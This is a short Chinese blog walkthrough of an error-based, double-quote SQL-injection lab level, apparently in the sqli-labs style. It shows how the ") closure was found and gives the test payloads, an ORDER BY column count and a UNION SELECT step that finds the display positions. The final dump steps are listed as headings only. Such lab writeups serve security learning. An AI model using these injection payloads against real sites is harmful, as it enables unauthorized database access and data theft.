题目:GET - Error based - Double Quotes - String
基于错误的GET双引号字符型注入
可能的注入点(不全)
'
"
)
')
")
观察页面
?id=1
有正常回显
判断注入点
?id=1'
正常回显,说明注入点不在单引号的闭合上
尝试朝前括号
?id=1)
正常回显,说明注入点不在括号上
尝试双引号
?id=1"
出现报错,可以看到这里报错的地方还有一个括号,说明这不是单纯的用双引号进行闭合,还要用到括号
测试
?id=1" )and 1=1 --+
成功得到该注入点为") (* ̄︶ ̄)
判断字段数
?id=1" )order by 3 --+
判断回显位
?id=-1" )union select 1,2,3 --+
爆数据库名
爆数据库中的数据表名
爆数据表中的数据列名
爆数据库的所有内容
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】